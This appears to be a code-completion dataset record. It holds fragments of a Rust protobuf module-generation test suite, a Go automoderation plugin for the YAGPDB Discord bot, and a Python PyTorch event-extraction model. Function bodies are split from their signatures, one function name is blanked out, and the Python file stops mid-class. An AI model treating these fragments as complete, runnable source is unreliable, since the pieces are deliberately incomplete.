imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: vec![Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
}],
}],
},
Proto {
path: PathBuf::from("/b/d.proto"),
package: "b".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: Vec::new(),
}],
},
],
},
Proto {
path: PathBuf::from("/a/c.proto"),
package: "a".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: vec![Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
}],
}],
},
Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: vec![Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
}],
},
Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
},
Proto {
path: PathBuf::from("/b/d.proto"),
package: "b".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: Vec::new(),
}],
},
Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: Vec::new(),
},
]
}
#[test]
fn test_add_deps_rec() {
let protos = protos();
let mut map = HashMap::new();
for proto in protos {
add_deps_rec(&proto, &proto, &mut map);
}
assert_eq!(map, {
let mut map = HashMap::new();
map.insert("a".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set
});
map.insert("b".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set
});
map.insert("c".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set.insert("c".into());
set
});
map.insert("d".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("c".into());
set.insert("d".into());
set
});
map
});
}
#[test]
fn test_from_protos() {
let protos = protos();
assert_eq!(from_protos(protos), {
let mut map = HashMap::new();
map.insert(
"a".into(),
Module {
package: "a".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set
},
children: HashMap::new(),
},
);
map.insert(
"b".into(),
Module {
package: "b".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set
},
children: HashMap::new(),
},
);
map.insert(
"c".into(),
Module {
package: "c".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set.insert("c".into());
set
},
children: HashMap::new(),
},
);
map.insert(
"d".into(),
Module {
package: "d".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("c".into());
set.insert("d".into());
set
},
children: HashMap::new(),
},
);
RootModule(map)
});
}
#[test]
fn test_root_module_gen_code() {
let root = from_protos(protos());
assert_eq!(
root.gen_code(),
r###"pub mod a { #[cfg(any(feature = "a",))]
include_proto!("a");
}
pub mod b { #[cfg(any(feature = "a",feature = "b",))]
include_proto!("b");
}
pub mod c { #[cfg(any(feature = "a",feature = "b",feature = "c",))]
include_proto!("c");
}
pub mod d { #[cfg(any(feature = "a",feature = "c",feature = "d",))]
include_proto!("d");
}
"###
);
}
#[test]
fn test_module_gen_code() {
let module = Module {
package: "mechiru.type".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("mechiru.type".into());
set
},
children: HashMap::new(),
};
assert_eq!(
module.gen_code(),
r###"#[cfg(any(feature = "mechiru-type",))]
include_proto!("mechiru.r#type");
"###
);
}
}
| {
let pkgs = protos
.iter()
.map(|p| p.package.feature_name())
.collect::<HashSet<_>>();
let mut pkgs = pkgs.into_iter().collect::<Vec<_>>();
pkgs.sort();
pkgs.into_iter()
.map(|f| {
let is_broken = broken_features.contains(&f);
format!(" {}{}", is_broken.then(|| "# ").unwrap_or_default(), f)
})
.collect::<Vec<_>>()
.join("\n")
} |
bot.go | package automod_legacy
import (
"time"
"github.com/botlabs-gg/yagpdb/v2/analytics"
"github.com/botlabs-gg/yagpdb/v2/bot"
"github.com/botlabs-gg/yagpdb/v2/bot/eventsystem"
"github.com/botlabs-gg/yagpdb/v2/commands"
"github.com/botlabs-gg/yagpdb/v2/common"
"github.com/botlabs-gg/yagpdb/v2/common/pubsub"
"github.com/botlabs-gg/yagpdb/v2/lib/discordgo"
"github.com/botlabs-gg/yagpdb/v2/lib/dstate"
"github.com/botlabs-gg/yagpdb/v2/moderation"
"github.com/karlseguin/ccache"
)
var _ bot.BotInitHandler = (*Plugin)(nil)
var (
// cache configs because they are used often
confCache *ccache.Cache
)
func (p *Plugin) BotInit() {
commands.MessageFilterFuncs = append(commands.MessageFilterFuncs, CommandsMessageFilterFunc)
eventsystem.AddHandlerAsyncLastLegacy(p, HandleMessageUpdate, eventsystem.EventMessageUpdate)
pubsub.AddHandler("update_automod_legacy_rules", HandleUpdateAutomodRules, nil)
confCache = ccache.New(ccache.Configure().MaxSize(1000))
}
// Invalidate the cache when the rules have changed
func HandleUpdateAutomodRules(event *pubsub.Event) {
confCache.Delete(KeyConfig(event.TargetGuildInt))
}
// CachedGetConfig either retrieves from local application cache or redis
func CachedGetConfig(gID int64) (*Config, error) |
func CommandsMessageFilterFunc(evt *eventsystem.EventData, msg *discordgo.Message) bool {
return !CheckMessage(evt, msg)
}
func HandleMessageUpdate(evt *eventsystem.EventData) {
CheckMessage(evt, evt.MessageUpdate().Message)
}
func CheckMessage(evt *eventsystem.EventData, m *discordgo.Message) bool {
if !bot.IsNormalUserMessage(m) {
return false
}
if m.Author.ID == common.BotUser.ID || m.Author.Bot || m.GuildID == 0 {
return false // Pls no panicerinos or banerinos self
}
if !evt.HasFeatureFlag(featureFlagEnabled) {
return false
}
cs := evt.GS.GetChannelOrThread(m.ChannelID)
if cs == nil {
logger.WithField("channel", m.ChannelID).Error("Channel not found in state")
return false
}
config, err := CachedGetConfig(cs.GuildID)
if err != nil {
logger.WithError(err).Error("Failed retrieving config")
return false
}
if !config.Enabled {
return false
}
member := dstate.MemberStateFromMember(m.Member)
member.GuildID = m.GuildID
del := false // Set if a rule triggered a message delete
punishMsg := ""
highestPunish := PunishNone
muteDuration := 0
rules := []Rule{config.Spam, config.Invite, config.Mention, config.Links, config.Words, config.Sites}
didCheck := false
// We gonna need to have this locked while we check
for _, r := range rules {
if r.ShouldIgnore(cs, m, member) {
continue
}
didCheck = true
d, punishment, msg, err := r.Check(m, cs)
if d {
del = true
}
if err != nil {
logger.WithError(err).WithField("guild", cs.GuildID).Error("Failed checking aumod rule:", err)
continue
}
// If the rule did not trigger a deletion there wasn't any violation
if !d {
continue
}
punishMsg += msg + "\n"
if punishment > highestPunish {
highestPunish = punishment
muteDuration = r.GetMuteDuration()
}
}
if !del {
if didCheck {
go analytics.RecordActiveUnit(cs.GuildID, &Plugin{}, "checked")
}
return false
}
go analytics.RecordActiveUnit(cs.GuildID, &Plugin{}, "rule_triggered")
if punishMsg != "" {
// Strip last newline
punishMsg = punishMsg[:len(punishMsg)-1]
}
go func() {
switch highestPunish {
case PunishNone:
err = moderation.WarnUser(nil, cs.GuildID, cs, m, common.BotUser, &member.User, "Automoderator: "+punishMsg)
case PunishMute:
err = moderation.MuteUnmuteUser(nil, true, cs.GuildID, cs, m, common.BotUser, "Automoderator: "+punishMsg, member, muteDuration)
case PunishKick:
err = moderation.KickUser(nil, cs.GuildID, cs, m, common.BotUser, "Automoderator: "+punishMsg, &member.User, -1)
case PunishBan:
err = moderation.BanUser(nil, cs.GuildID, cs, m, common.BotUser, "Automoderator: "+punishMsg, &member.User)
}
// Execute the punishment before removing the message to make sure it's included in logs
common.BotSession.ChannelMessageDelete(m.ChannelID, m.ID)
if err != nil && err != moderation.ErrNoMuteRole && !common.IsDiscordErr(err, discordgo.ErrCodeMissingPermissions, discordgo.ErrCodeMissingAccess) {
logger.WithError(err).Error("Error carrying out punishment")
}
}()
return true
}
| {
confItem, err := confCache.Fetch(KeyConfig(gID), time.Minute*5, func() (interface{}, error) {
c, err := GetConfig(gID)
if err != nil {
return nil, err
}
// Compile sites and words
c.Sites.GetCompiled()
c.Words.GetCompiled()
return c, nil
})
if err != nil {
return nil, err
}
return confItem.Value().(*Config), nil
} |
Joint_Event_Extraction.py | import sys
import os
import numpy as np
import random
from collections import OrderedDict
import pickle
import datetime
from tqdm import tqdm
from recordclass import recordclass
import math
import torch
import torch.autograd as autograd
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import json
# Helper funcs
def custom_print(*msg):
for i in range(0, len(msg)):
if i == len(msg) - 1:
print(msg[i])
logger.write(str(msg[i]) + '\n')
else:
print(msg[i], ' ', end='')
logger.write(str(msg[i]))
def load_word_embedding(embed_file, vocab):
custom_print('vocab length:', len(vocab))
embed_vocab = OrderedDict()
rev_embed_vocab = OrderedDict()
embed_matrix = list()
embed_vocab['<PAD>'] = 0
rev_embed_vocab[0] = '<PAD>'
embed_matrix.append(np.zeros(word_embed_dim, dtype=np.float32))
embed_vocab['<UNK>'] = 1
rev_embed_vocab[1] = '<UNK>'
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
embed_vocab['<SOS>'] = 2
rev_embed_vocab[2] = '<SOS>'
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
embed_vocab['<EOS>'] = 3
rev_embed_vocab[3] = '<EOS>'
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
word_idx = 4
with open(embed_file, "r") as f:
for line in f:
parts = line.split()
if len(parts) < word_embed_dim + 1:
continue
word = parts[0]
if word in vocab and vocab[word] >= word_min_freq:
vec = [np.float32(val) for val in parts[1:]]
embed_matrix.append(vec)
embed_vocab[word] = word_idx
rev_embed_vocab[word_idx] = word
word_idx += 1
for word in vocab:
if word not in embed_vocab and vocab[word] >= word_min_freq:
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
embed_vocab[word] = word_idx
rev_embed_vocab[word_idx] = word
word_idx += 1
custom_print('embed dictionary length:', len(embed_vocab))
return embed_vocab, rev_embed_vocab, np.array(embed_matrix, dtype=np.float32)
def build_vocab(data, events, arguments, roles, vocab_file, embed_file):
vocab = OrderedDict()
char_v = OrderedDict()
char_v['<PAD>'] = 0
char_v['<UNK>'] = 1
char_v[';'] = 2
char_v['|'] = 3
char_idx = 4
for d in data:
for word in d.SrcWords:
if word not in vocab:
vocab[word] = 1
else:
vocab[word] += 1
for c in word:
if c not in char_v:
char_v[c] = char_idx
char_idx += 1
for event in events:
vocab[event] = word_min_freq
for argument in arguments:
vocab[argument] = word_min_freq
for role in roles:
vocab[role] = word_min_freq
vocab[';'] = word_min_freq
vocab['|'] = word_min_freq
word_v, rev_word_v, embed_matrix = load_word_embedding(embed_file, vocab)
output = open(vocab_file, 'wb')
pickle.dump([word_v, char_v], output)
output.close()
return word_v, rev_word_v, char_v, embed_matrix
def load_vocab(vocab_file):
with open(vocab_file, 'rb') as f:
word_v, char_v = pickle.load(f)
return word_v, char_v
def get_adj_mat(amat):
K = 5
adj_mat = np.zeros((len(amat), len(amat)), np.float32)
for i in range(len(amat)):
for j in range(len(amat)):
if 0 <= amat[i][j] <= K:
adj_mat[i][j] = 1.0 / math.pow(2, amat[i][j])
else:
adj_mat[i][j] = 0
return adj_mat
def get_data(src_lines, trg_lines, datatype):
samples = []
uid = 1
src_len = -1
trg_len = -1
for i in range(0, len(src_lines)):
src_line = src_lines[i].strip()
trg_line = trg_lines[i].strip()
src_words = src_line.split()
if datatype == 1:
tuples = trg_line.strip().split('|')
random.shuffle(tuples)
new_trg_line = ' | '.join(tuples)
assert len(trg_line.split()) == len(new_trg_line.split())
trg_line = new_trg_line
trg_words = list()
trg_words.append('<SOS>')
trg_words += trg_line.split()
trg_words.append('<EOS>')
if datatype == 1 and (len(src_words) > max_src_len or len(trg_words) > max_trg_len + 1):
continue
if len(src_words) > src_len:
src_len = len(src_words)
if len(trg_words) > trg_len:
trg_len = len(trg_words)
sample = Sample(Id=uid, SrcLen=len(src_words), SrcWords=src_words, TrgLen=len(trg_words),
TrgWords=trg_words) #c
samples.append(sample)
uid += 1
print(src_len)
print(trg_len)
return samples
def | (src_file, trg_file, datatype):
reader = open(src_file)
src_lines = reader.readlines()
reader.close()
reader = open(trg_file)
trg_lines = reader.readlines()
reader.close()
# tot_len = 100
# src_lines = src_lines[0:min(tot_len, len(src_lines))]
# trg_lines = trg_lines[0:min(tot_len, len(trg_lines))]
# adj_lines = adj_lines[0:min(tot_len, len(adj_lines))]
data = get_data(src_lines, trg_lines, datatype)
return data
#event_lines, argument_lines, roles_lines
# to add option for less detailed checks
def check_event_trigger(ref_string, pred_string):
return (ref_string == pred_string)
pass
def check_event_type(ref_string, pred_string, event_lines):
if granular_mode == 0:
if pred_string in event_lines:
return (ref_string == pred_string)
else:
# print("invalid prediction")
return False
pass
if granular_mode == 1:
pred_token = pred_string.split(":")[0]
ref_token = ref_string.split(":")[0]
return (pred_token == ref_token)
pass
def check_event_argument(ref_string, pred_string):
return (ref_string == pred_string)
pass
def check_argument_type(ref_string, pred_string, argument_lines):
if granular_mode == 0:
if pred_string in argument_lines:
return (ref_string == pred_string)
else:
# print("invalid prediction")
return False
pass
if granular_mode == 1:
pred_token = pred_string.split(":")[0]
ref_token = ref_string.split(":")[0]
return (pred_token == ref_token)
pass
def check_argument_role(ref_string, pred_string, roles_lines):
if pred_string in roles_lines:
return (ref_string == pred_string)
else:
# print("invalid prediction")
return False
pass
def calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines):
list_of_tracking_metrics = ['predicted_tuples',
'ground_truth_tuples',
'correct_predictions',
'events_count',
'correct_events',
'correct_event_type',
'correct_arguments',
'correct_argment_types',
'correct_argument_roles'
]
metric_counts = dict.fromkeys(list_of_tracking_metrics, 0)
for i in range(0, min(len(ref_lines), len(pred_lines))):
ref_line = ref_lines[i].strip()
pred_line = pred_lines[i].strip()
ref_tuples = ref_line.split('|')
pred_tuples = pred_line.split('|')
# find a way to compare multiple tuples
# correct - t1 | t2 | t3
# pred - p1 | p2
# postives = 3 [number of ground truths minus nones]
# predicted_pos = 2 [number of preds minus nones]
# TP = correct preds
# TP + FP = predicted
# TP + FN = positives
# Precision = correct / predicted_pos
# Recall = correct / positives
# f = pr/p+r
# handling repeated predictions
# set_of_preds = set()
# for pred_tuple in pred_tuples:
# set_of_preds.add(pred_tuple.strip())
# pred_tuples = list(set_of_preds)
for pred_tuple in pred_tuples:
pred_strings = pred_tuple.split(';')
if(len(pred_strings) < 3):
continue
# in the case of no argument detection, we only calculate the event trigger scores
if(pred_strings[2].strip().lower()) == 'none':
max_matches = 0
part_matches = []
for ref_tuple in ref_tuples:
# ssss
ev1, ev2 = cal_f1_for_pair(ref_tuple, pred_tuple, event_lines)
pair_score = ev1+ev2
if pair_score > max_matches:
max_matches = pair_score
part_matches = (ev1, ev2)
pass
pass
metric_counts['events_count'] += 1
if ev1 == 1:
metric_counts['correct_events'] += 1
if ev2 == 1:
metric_counts['correct_event_type'] += 1
continue
max_matches = 0
part_matches = cal_f1_for_tuple(ref_tuples[0], pred_tuple, event_lines, argument_lines, roles_lines)
for ref_tuple in ref_tuples:
res = cal_f1_for_tuple(ref_tuple, pred_tuple, event_lines, argument_lines, roles_lines)
tuple_score = sum(res)
if tuple_score >= max_matches:
max_matches = tuple_score
part_matches = res
pass
pass
metric_counts['predicted_tuples'] += 1
metric_counts['events_count'] += 1
if max_matches >= 4:
metric_counts['correct_predictions'] += 1
if part_matches[0] == 1:
metric_counts['correct_events'] += 1
if part_matches[1] == 1:
metric_counts['correct_event_type'] += 1
if part_matches[2] == 1:
metric_counts['correct_arguments'] += 1
if part_matches[3] == 1:
metric_counts['correct_argment_types'] += 1
if part_matches[4] == 1:
metric_counts['correct_argument_roles'] += 1
pass
for ref_tuple in ref_tuples:
if(ref_tuple.split(';')[2].strip().lower()) != 'none':
metric_counts['ground_truth_tuples'] += 1
pass
print(metric_counts)
precision = float(metric_counts['correct_predictions'] / (metric_counts['predicted_tuples'] + 1e-08))
recall = float(metric_counts['correct_predictions'] / (metric_counts['ground_truth_tuples'] + 1e-08))
f1 = 2 * precision * recall / (precision + recall + 1e-08)
precision = round(precision, 3)
recall = round(recall, 3)
f1 = round(f1, 3)
print("Partwise Results")
event_acc = metric_counts['correct_events']/ (metric_counts['events_count'] + 1e-08)
evtype_acc = metric_counts['correct_event_type']/ (metric_counts['events_count'] + 1e-08)
argument_acc = metric_counts['correct_arguments']/ (metric_counts['predicted_tuples'] + 1e-08)
argtype_acc = metric_counts['correct_argment_types']/ (metric_counts['predicted_tuples'] + 1e-08)
role_acc = metric_counts['correct_argument_roles']/ (metric_counts['predicted_tuples'] + 1e-08)
print(f'Event Trigger Word Accuracy: {event_acc}')
print(f'Event Type Accuracy: {evtype_acc}')
print(f'Argument Identification Accuracy: {argument_acc}')
print(f'Argument Type Accuracy: {argtype_acc}')
print(f'Argument Role Accuracy: {role_acc}')
print(f'Macro f-score: {f1}')
targ_file = os.path.join(trg_data_folder, 'Results_logger.txt')
f = open(targ_file, "a")
f.write(f'Event Trigger Word Accuracy: {event_acc}')
f.write("\n")
f.write(f'Event Type Accuracy: {evtype_acc}')
f.write("\n")
f.write(f'Argument Identification Accuracy: {argument_acc}')
f.write("\n")
f.write(f'Argument Type Accuracy: {argtype_acc}')
f.write("\n")
f.write(f'Argument Role Accuracy: {role_acc}')
f.write("\n")
f.write(f'Macro f-score: {f1}')
f.write("\n")
f.close()
return f1
def cal_f1_for_pair(ref_tuple: str ,
pred_tuple: str,
event_lines: list
) -> list:
ref_strings = ref_tuple.split(';')
pred_strings = pred_tuple.split(';')
ev1 = int( check_event_trigger(ref_strings[0].strip(), pred_strings[0].strip()) )
ev2 = int( check_event_type(ref_strings[1].strip(), pred_strings[1].strip(), event_lines) )
return ev1, ev2
def cal_f1_for_tuple(ref_tuple: str ,
pred_tuple: str,
event_lines: list,
argument_lines: list,
roles_lines: list
) -> list:
ref_strings = ref_tuple.split(';')
pred_strings = pred_tuple.split(';')
if (len (pred_strings) != 5 ):
if (len (pred_strings) >= 2 ):
ev1 = int( check_event_trigger(ref_strings[0].strip(), pred_strings[0].strip()) )
ev2 = int( check_event_type(ref_strings[1].strip(), pred_strings[1].strip(), event_lines) )
return [ev1, ev2, 0, 0, 0]
return list([0,0,0,0,0])
ev1 = int( check_event_trigger(ref_strings[0].strip(), pred_strings[0].strip()) )
ev2 = int( check_event_type(ref_strings[1].strip(), pred_strings[1].strip(), event_lines) )
ev3 = int( check_event_argument(ref_strings[2].strip(), pred_strings[2].strip()) )
ev4 = int( check_argument_type(ref_strings[3].strip(), pred_strings[3].strip(), argument_lines) )
ev5 = int( check_argument_role(ref_strings[4].strip(), pred_strings[4].strip(), roles_lines) )
ret = [ev1, ev2, ev3, ev4, ev5]
return ret
def get_model(model_id):
if model_id == 1:
return SeqToSeqModel()
def write_test_res(data, preds, attns, outfile):
writer = open(outfile, 'w')
for i in range(0, len(data)):
pred_words = get_pred_words(preds[i], attns[i], data[i].SrcWords)[:-1]
writer.write(' '.join(pred_words) + '\n')
writer.close()
def set_random_seeds(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if n_gpu > 1:
torch.cuda.manual_seed_all(seed)
def get_max_len(sample_batch):
src_max_len = len(sample_batch[0].SrcWords)
for idx in range(1, len(sample_batch)):
if len(sample_batch[idx].SrcWords) > src_max_len:
src_max_len = len(sample_batch[idx].SrcWords)
trg_max_len = len(sample_batch[0].TrgWords)
for idx in range(1, len(sample_batch)):
if len(sample_batch[idx].TrgWords) > trg_max_len:
trg_max_len = len(sample_batch[idx].TrgWords)
return src_max_len, trg_max_len
def get_words_index_seq(words, max_len):
seq = list()
for word in words:
if word in word_vocab:
seq.append(word_vocab[word])
else:
seq.append(word_vocab['<UNK>'])
pad_len = max_len - len(words)
for i in range(0, pad_len):
seq.append(word_vocab['<PAD>'])
return seq
def get_target_words_index_seq(words, max_len):
seq = list()
for word in words:
if word in word_vocab:
seq.append(word_vocab[word])
else:
seq.append(word_vocab['<UNK>'])
pad_len = max_len - len(words)
for i in range(0, pad_len):
seq.append(word_vocab['<EOS>'])
return seq
def get_padded_mask(cur_len, max_len):
mask_seq = list()
for i in range(0, cur_len):
mask_seq.append(0)
pad_len = max_len - cur_len
for i in range(0, pad_len):
mask_seq.append(1)
return mask_seq
def get_target_vocab_mask(src_words):
mask = []
for i in range(0, len(word_vocab)):
mask.append(1)
for word in src_words:
if word in word_vocab:
mask[word_vocab[word]] = 0
# events, arguments, roles
for event in events:
mask[word_vocab[event]] = 0
for argument in arguments:
mask[word_vocab[argument]] = 0
for role in roles:
mask[word_vocab[role]] = 0
mask[word_vocab['<UNK>']] = 0
mask[word_vocab['<EOS>']] = 0
mask[word_vocab[';']] = 0
mask[word_vocab['|']] = 0
return mask
def get_rel_mask(trg_words, max_len):
mask_seq = list()
for word in trg_words:
mask_seq.append(0)
# if word in relations:
# mask_seq.append(0)
# else:
# mask_seq.append(1)
pad_len = max_len - len(trg_words)
for i in range(0, pad_len):
mask_seq.append(1)
return mask_seq
def get_char_seq(words, max_len):
char_seq = list()
for i in range(0, conv_filter_size - 1):
char_seq.append(char_vocab['<PAD>'])
for word in words:
for c in word[0:min(len(word), max_word_len)]:
if c in char_vocab:
char_seq.append(char_vocab[c])
else:
char_seq.append(char_vocab['<UNK>'])
pad_len = max_word_len - len(word)
for i in range(0, pad_len):
char_seq.append(char_vocab['<PAD>'])
for i in range(0, conv_filter_size - 1):
char_seq.append(char_vocab['<PAD>'])
pad_len = max_len - len(words)
for i in range(0, pad_len):
for i in range(0, max_word_len + conv_filter_size - 1):
char_seq.append(char_vocab['<PAD>'])
return char_seq
def get_relations(file_name):
rels = []
reader = open(file_name)
lines = reader.readlines()
reader.close()
for line in lines:
rels.append(line.strip())
return rels
def get_batch_data(cur_samples, is_training=False):
"""
Returns the training samples and labels as numpy array
"""
batch_src_max_len, batch_trg_max_len = get_max_len(cur_samples)
src_words_list = list()
src_words_mask_list = list()
src_char_seq = list()
trg_words_list = list()
trg_vocab_mask = list()
adj_lst = []
target = list()
cnt = 0
for sample in cur_samples:
src_words_list.append(get_words_index_seq(sample.SrcWords, batch_src_max_len))
src_words_mask_list.append(get_padded_mask(sample.SrcLen, batch_src_max_len))
src_char_seq.append(get_char_seq(sample.SrcWords, batch_src_max_len))
trg_vocab_mask.append(get_target_vocab_mask(sample.SrcWords))
# cur_masked_adj = np.zeros((batch_src_max_len, batch_src_max_len), dtype=np.float32)
# cur_masked_adj[:len(sample.SrcWords), :len(sample.SrcWords)] = sample.AdjMat
# adj_lst.append(cur_masked_adj)
if is_training:
padded_trg_words = get_words_index_seq(sample.TrgWords, batch_trg_max_len)
trg_words_list.append(padded_trg_words)
target.append(padded_trg_words[1:])
else:
trg_words_list.append(get_words_index_seq(['<SOS>'], 1))
cnt += 1
return {'src_words': np.array(src_words_list, dtype=np.float32),
'src_chars': np.array(src_char_seq),
'src_words_mask': np.array(src_words_mask_list),
'adj': np.array(adj_lst),
'trg_vocab_mask': np.array(trg_vocab_mask),
'trg_words': np.array(trg_words_list, dtype=np.int32),
'target': np.array(target)}
def shuffle_data(data):
custom_print(len(data))
data.sort(key=lambda x: x.SrcLen)
num_batch = int(len(data) / batch_size)
rand_idx = random.sample(range(num_batch), num_batch)
new_data = []
for idx in rand_idx:
new_data += data[batch_size * idx: batch_size * (idx + 1)]
if len(new_data) < len(data):
new_data += data[num_batch * batch_size:]
return new_data
def get_pred_words(preds, attns, src_words):
pred_words = []
for i in range(0, max_trg_len):
word_idx = preds[i]
if word_vocab['<EOS>'] == word_idx:
pred_words.append('<EOS>')
break
elif att_type != 'None' and copy_on and word_vocab['<UNK>'] == word_idx:
word_idx = attns[i]
pred_words.append(src_words[word_idx])
else:
pred_words.append(rev_word_vocab[word_idx])
return pred_words
class WordEmbeddings(nn.Module):
def __init__(self, vocab_size, embed_dim, pre_trained_embed_matrix, drop_out_rate):
super(WordEmbeddings, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
self.embeddings.weight.data.copy_(torch.from_numpy(pre_trained_embed_matrix))
self.dropout = nn.Dropout(drop_out_rate)
def forward(self, words_seq):
word_embeds = self.embeddings(words_seq)
word_embeds = self.dropout(word_embeds)
return word_embeds
def weight(self):
return self.embeddings.weight
# Potentially use a pretrained BERT - 509
class CharEmbeddings(nn.Module):
def __init__(self, vocab_size, embed_dim, drop_out_rate):
super(CharEmbeddings, self).__init__()
# Layers
self.embeddings = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
self.dropout = nn.Dropout(drop_out_rate)
def forward(self, words_seq):
char_embeds = self.embeddings(words_seq)
char_embeds = self.dropout(char_embeds)
return char_embeds
# DONT CHANGE CLASSES
# 543
class Encoder(nn.Module):
def __init__(self, input_dim, hidden_dim, layers, is_bidirectional, drop_out_rate):
super(Encoder, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.layers = layers
self.is_bidirectional = is_bidirectional
self.drop_rate = drop_out_rate
self.char_embeddings = CharEmbeddings(len(char_vocab), char_embed_dim, drop_rate)
# Remove In case we want to BERT
self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.layers, batch_first=True,
bidirectional=self.is_bidirectional)
self.dropout = nn.Dropout(self.drop_rate)
self.conv1d = nn.Conv1d(char_embed_dim, char_feature_size, conv_filter_size)
self.max_pool = nn.MaxPool1d(max_word_len + conv_filter_size - 1, max_word_len + conv_filter_size - 1)
def forward(self, words_input, char_seq, adj, is_training=False):
char_embeds = self.char_embeddings(char_seq)
char_embeds = char_embeds.permute(0, 2, 1)
char_feature = torch.tanh(self.max_pool(self.conv1d(char_embeds)))
char_feature = char_feature.permute(0, 2, 1)
words_input = torch.cat((words_input, char_feature), -1)
outputs, hc = self.lstm(words_input)
outputs = self.dropout(outputs)
return outputs
# 597
class Attention(nn.Module):
def __init__(self, input_dim):
super(Attention, self).__init__()
self.input_dim = input_dim
self.linear_ctx = nn.Linear(self.input_dim, self.input_dim, bias=False)
self.linear_query = nn.Linear(self.input_dim, self.input_dim, bias=True)
self.v = nn.Linear(self.input_dim, 1)
def forward(self, s_prev, enc_hs, src_mask):
uh = self.linear_ctx(enc_hs)
wq = self.linear_query(s_prev)
wquh = torch.tanh(wq + uh)
attn_weights = self.v(wquh).squeeze()
attn_weights.data.masked_fill_(src_mask.data, -float('inf'))
attn_weights = F.softmax(attn_weights, dim=-1)
ctx = torch.bmm(attn_weights.unsqueeze(1), enc_hs).squeeze()
return ctx, attn_weights
# 617
class NGram_Attention(nn.Module):
def __init__(self, input_dim, N):
super(NGram_Attention, self).__init__()
self.input_dim = input_dim
self.layers = N
self.V_layers = nn.ModuleList()
self.W_layers = nn.ModuleList()
for i in range(N):
self.V_layers.append(nn.Linear(input_dim, input_dim))
self.W_layers.append(nn.Linear(input_dim, input_dim))
def forward(self, s_prev, enc_hs, src_mask):
att = torch.bmm(s_prev.unsqueeze(1), self.V_layers[0](enc_hs).transpose(1, 2)).squeeze()
att.data.masked_fill_(src_mask.data, -float('inf'))
att = F.softmax(att, dim=-1)
ctx = self.W_layers[0](torch.bmm(att.unsqueeze(1), enc_hs).squeeze())
for i in range(1, self.layers):
enc_hs_ngram = torch.nn.AvgPool1d(i+1, 1)(enc_hs.transpose(1, 2)).transpose(1, 2)
n_mask = src_mask.unsqueeze(1).float()
n_mask = torch.nn.AvgPool1d(i+1, 1)(n_mask).squeeze()
n_mask[n_mask > 0] = 1
n_mask = n_mask.byte()
n_att = torch.bmm(s_prev.unsqueeze(1), self.V_layers[i](enc_hs_ngram).transpose(1, 2)).squeeze()
n_att.data.masked_fill_(n_mask.data, -float('inf'))
n_att = F.softmax(n_att, dim=-1)
ctx += self.W_layers[i](torch.bmm(n_att.unsqueeze(1), enc_hs_ngram).squeeze())
return ctx, att
# 588
def mean_over_time(x, mask):
x.data.masked_fill_(mask.unsqueeze(2).data, 0)
x = torch.sum(x, dim=1)
time_steps = torch.sum(mask.eq(0), dim=1, keepdim=True).float()
x /= time_steps
return x
# 645
class Decoder(nn.Module):
def __init__(self, input_dim, hidden_dim, layers, drop_out_rate, max_length):
super(Decoder, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.layers = layers
self.drop_rate = drop_out_rate
self.max_length = max_length
if att_type == 'None':
self.lstm = nn.LSTMCell(2 * self.input_dim, self.hidden_dim, self.layers)
elif att_type == 'Unigram':
self.attention = Attention(input_dim)
self.lstm = nn.LSTMCell(2 * self.input_dim, self.hidden_dim, self.layers)
else:
self.attention = NGram_Attention(input_dim, 3)
self.lstm = nn.LSTMCell(3 * self.input_dim, self.hidden_dim, self.layers)
self.dropout = nn.Dropout(self.drop_rate)
self.ent_out = nn.Linear(self.input_dim, len(word_vocab))
def forward(self, y_prev, h_prev, enc_hs, src_word_embeds, src_mask, is_training=False):
src_time_steps = enc_hs.size()[1]
if att_type == 'None':
ctx = mean_over_time(enc_hs, src_mask)
attn_weights = torch.zeros(src_mask.size()).cuda()
elif att_type == 'Unigram':
s_prev = h_prev[0]
s_prev = s_prev.unsqueeze(1)
s_prev = s_prev.repeat(1, src_time_steps, 1)
ctx, attn_weights = self.attention(s_prev, enc_hs, src_mask)
else:
last_index = src_mask.size()[1] - torch.sum(src_mask, dim=-1).long() - 1
last_index = last_index.unsqueeze(1).unsqueeze(1).repeat(1, 1, enc_hs.size()[-1])
enc_last = torch.gather(enc_hs, 1, last_index).squeeze()
ctx, attn_weights = self.attention(enc_last, src_word_embeds, src_mask)
ctx = torch.cat((enc_last, ctx), -1)
y_prev = y_prev.squeeze()
s_cur = torch.cat((y_prev, ctx), 1)
hidden, cell_state = self.lstm(s_cur, h_prev)
hidden = self.dropout(hidden)
